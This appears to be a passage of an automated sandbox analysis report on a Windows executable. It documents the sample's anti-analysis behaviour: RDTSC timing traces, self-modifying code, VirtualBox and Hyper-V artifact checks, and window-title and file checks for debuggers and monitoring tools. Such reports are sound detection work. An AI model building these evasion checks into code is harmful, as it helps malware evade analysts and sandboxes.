Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0F97 second address: 6FE0FBF instructions: 0x00000000 rdtsc 0x00000002 call 00007FA6CD35B91Fh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bh, F0h 0x00000019 mov si, 7359h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0FFD second address: 6FE1078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FA6CC859ECEh 0x00000010 test edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FA6CC859ECDh 0x0000001b and ecx, 0FF46416h 0x00000021 jmp 00007FA6CC859ED1h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FA6CC859ED0h 0x0000002d sub ax, 8838h 0x00000032 jmp 00007FA6CC859ECBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1078 second address: 6FE107E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE107E second address: 6FE1082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1082 second address: 6FE1086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1086 second address: 6FE1144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FA73ADF84E7h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 mov edi, 19C8C40Ah 0x00000018 popad 0x00000019 mov eax, dword ptr [ebp-14h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FA6CC859ED7h 0x00000023 adc cl, 0000005Eh 0x00000026 jmp 00007FA6CC859ED9h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FA6CC859ED0h 0x00000032 xor esi, 143C8758h 0x00000038 jmp 00007FA6CC859ECBh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ecx, esi 0x00000041 jmp 00007FA6CC859ED6h 0x00000046 mov dword ptr [esi+0Ch], eax 0x00000049 jmp 00007FA6CC859ED0h 0x0000004e mov edx, 756006ECh 0x00000053 jmp 00007FA6CC859ED0h 0x00000058 sub eax, eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1144 second address: 6FE1148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1148 second address: 6FE1162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1162 second address: 6FE11F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FA6CD35B91Dh 0x0000000b adc si, 6066h 0x00000010 jmp 00007FA6CD35B921h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d jmp 00007FA6CD35B91Eh 0x00000022 pop edi 0x00000023 jmp 00007FA6CD35B920h 0x00000028 test eax, eax 0x0000002a jmp 00007FA6CD35B920h 0x0000002f jne 00007FA73B8F9E2Eh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ch, dh 0x0000003a pushfd 0x0000003b jmp 00007FA6CD35B926h 0x00000040 add cx, 14C8h 0x00000045 jmp 00007FA6CD35B91Bh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE11F8 second address: 6FE1227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6CC859ECDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1227 second address: 6FE12E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B927h 0x00000009 xor si, 411Eh 0x0000000e jmp 00007FA6CD35B929h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi] 0x0000001c pushad 0x0000001d mov bx, 2C2Ch 0x00000021 call 00007FA6CD35B925h 0x00000026 push eax 0x00000027 pop edi 0x00000028 pop ecx 0x00000029 popad 0x0000002a mov dword ptr [edx], eax 0x0000002c pushad 0x0000002d mov dx, 308Ch 0x00000031 mov eax, ebx 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+04h] 0x00000037 jmp 00007FA6CD35B927h 0x0000003c mov dword ptr [edx+04h], eax 0x0000003f jmp 00007FA6CD35B926h 0x00000044 mov eax, dword ptr [esi+08h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FA6CD35B927h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE12E0 second address: 6FE132A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FA6CC859ECEh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA6CC859ED7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE132A second address: 6FE13C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007FA6CD35B91Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FA6CD35B920h 0x00000019 mov dword ptr [edx+10h], eax 0x0000001c jmp 00007FA6CD35B920h 0x00000021 mov eax, dword ptr [esi+14h] 0x00000024 jmp 00007FA6CD35B920h 0x00000029 mov dword ptr [edx+14h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FA6CD35B91Dh 0x00000035 sbb esi, 199AFD06h 0x0000003b jmp 00007FA6CD35B921h 0x00000040 popfd 0x00000041 push eax 0x00000042 pop ebx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE13C0 second address: 6FE146E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CC859ED3h 0x00000009 adc esi, 4B1AEC3Eh 0x0000000f jmp 00007FA6CC859ED9h 0x00000014 popfd 0x00000015 mov ch, 0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+18h] 0x0000001d jmp 00007FA6CC859ED3h 0x00000022 mov dword ptr [edx+18h], eax 0x00000025 jmp 00007FA6CC859ED6h 0x0000002a mov eax, dword ptr [esi+1Ch] 0x0000002d pushad 0x0000002e push ecx 0x0000002f pushad 0x00000030 popad 0x00000031 pop ebx 0x00000032 call 00007FA6CC859ED8h 0x00000037 mov cx, 2AD1h 0x0000003b pop esi 0x0000003c popad 0x0000003d mov dword ptr [edx+1Ch], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FA6CC859ED8h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE146E second address: 6FE1480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1480 second address: 6FE1484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1484 second address: 6FE1499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 mov ax, 891Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1499 second address: 6FE14F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov ebx, 53DB83CEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+20h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6CC859ECBh 0x00000017 sub si, 7C7Eh 0x0000001c jmp 00007FA6CC859ED9h 0x00000021 popfd 0x00000022 mov bh, ah 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+24h] 0x00000028 jmp 00007FA6CC859ED3h 0x0000002d mov dword ptr [edx+24h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE14F7 second address: 6FE14FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE14FB second address: 6FE1501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1501 second address: 6FE1550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+28h] 0x0000000d pushad 0x0000000e pushad 0x0000000f mov dl, al 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 pushad 0x00000015 movsx edx, si 0x00000018 push eax 0x00000019 pop edi 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [edx+28h], eax 0x0000001f jmp 00007FA6CD35B924h 0x00000024 mov ecx, dword ptr [esi+2Ch] 0x00000027 jmp 00007FA6CD35B920h 0x0000002c mov dword ptr [edx+2Ch], ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1550 second address: 6FE1556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1556 second address: 6FE15F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B922h 0x00000009 and cl, FFFFFFF8h 0x0000000c jmp 00007FA6CD35B91Bh 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ax, word ptr [esi+30h] 0x0000001b jmp 00007FA6CD35B922h 0x00000020 mov word ptr [edx+30h], ax 0x00000024 jmp 00007FA6CD35B920h 0x00000029 mov ax, word ptr [esi+32h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA6CD35B91Dh 0x00000036 and ax, B6F6h 0x0000003b jmp 00007FA6CD35B921h 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA6CD35B920h 0x00000047 and cl, 00000018h 0x0000004a jmp 00007FA6CD35B91Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE15F7 second address: 6FE15FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE15FD second address: 6FE1601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1601 second address: 6FE163D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FA6CC859ECBh 0x00000017 jmp 00007FA6CC859ED8h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE163D second address: 6FE1733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B921h 0x00000009 xor ax, 35C6h 0x0000000e jmp 00007FA6CD35B921h 0x00000013 popfd 0x00000014 mov ecx, 6D39C277h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+34h] 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA6CD35B922h 0x0000002a and ecx, 0C196198h 0x00000030 jmp 00007FA6CD35B91Bh 0x00000035 popfd 0x00000036 jmp 00007FA6CD35B928h 0x0000003b popad 0x0000003c popad 0x0000003d mov dword ptr [edx+34h], eax 0x00000040 jmp 00007FA6CD35B920h 0x00000045 test ecx, 00000700h 0x0000004b jmp 00007FA6CD35B920h 0x00000050 jne 00007FA73B8F994Ch 0x00000056 pushad 0x00000057 mov cx, B9EDh 0x0000005b pushfd 0x0000005c jmp 00007FA6CD35B91Ah 0x00000061 or ah, FFFFFF88h 0x00000064 jmp 00007FA6CD35B91Bh 0x00000069 popfd 0x0000006a popad 0x0000006b or dword ptr [edx+38h], FFFFFFFFh 0x0000006f jmp 00007FA6CD35B926h 0x00000074 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FA6CD35B91Ah 0x00000081 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1733 second address: 6FE1739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1739 second address: 6FE17CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 adc cx, 8A48h 0x0000000e jmp 00007FA6CD35B91Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA6CD35B928h 0x0000001a and ch, FFFFFFA8h 0x0000001d jmp 00007FA6CD35B91Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 or dword ptr [edx+40h], FFFFFFFFh 0x0000002a pushad 0x0000002b pushad 0x0000002c mov cx, DF31h 0x00000030 mov cl, 3Dh 0x00000032 popad 0x00000033 pushad 0x00000034 call 00007FA6CD35B929h 0x00000039 pop eax 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d popad 0x0000003e pop esi 0x0000003f jmp 00007FA6CD35B91Dh 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edi, 10C5C7FEh 0x0000004d mov edi, 65B2660Ah 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17CE second address: 6FE17F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 092871F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CC859ED0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17F0 second address: 6FE17F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17F6 second address: 6FE17FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17FC second address: 6FE1800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 7030BAB second address: 7030BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 7030BB1 second address: 7030BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA6CD35B921h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6CD35B91Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD07F6 second address: 6FD0813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD0813 second address: 6FD0831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD0831 second address: 6FD08D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA6CC859ED9h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6CC859ECCh 0x00000017 xor al, 00000068h 0x0000001a jmp 00007FA6CC859ECBh 0x0000001f popfd 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA6CC859ED6h 0x00000027 add esi, 6E63EBC8h 0x0000002d jmp 00007FA6CC859ECBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FA6CC859ED8h 0x00000039 adc ch, 00000028h 0x0000003c jmp 00007FA6CC859ECBh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08D4 second address: 6FD08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08D8 second address: 6FD08DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08DE second address: 6FD08E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08E4 second address: 6FD08E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F70038 second address: 6F7003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F7003C second address: 6F70042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F70042 second address: 6F7005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B929h 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSpecial instruction interceptor: First address: 97FB81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSpecial instruction interceptor: First address: 97D07E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSpecial instruction interceptor: First address: B44BCD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSpecial instruction interceptor: First address: B2696F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSpecial instruction interceptor: First address: BAD95B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00439980 rdtsc 0_2_00439980
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe TID: 768Thread sleep time: -40020s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe TID: 6856Thread sleep time: -34017s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 2OJYjm4J1B.exe, 00000000.00000002.1871220203.000000000155F000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868406465.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1844302011.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868023609.000000000154D000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1867965791.0000000001541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll": 8O og"
Source: 2OJYjm4J1B.exeBinary or memory string: Hyper-V RAW
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: NTICE
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: SICE
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeProcess queried: DebugPortJump to behavior
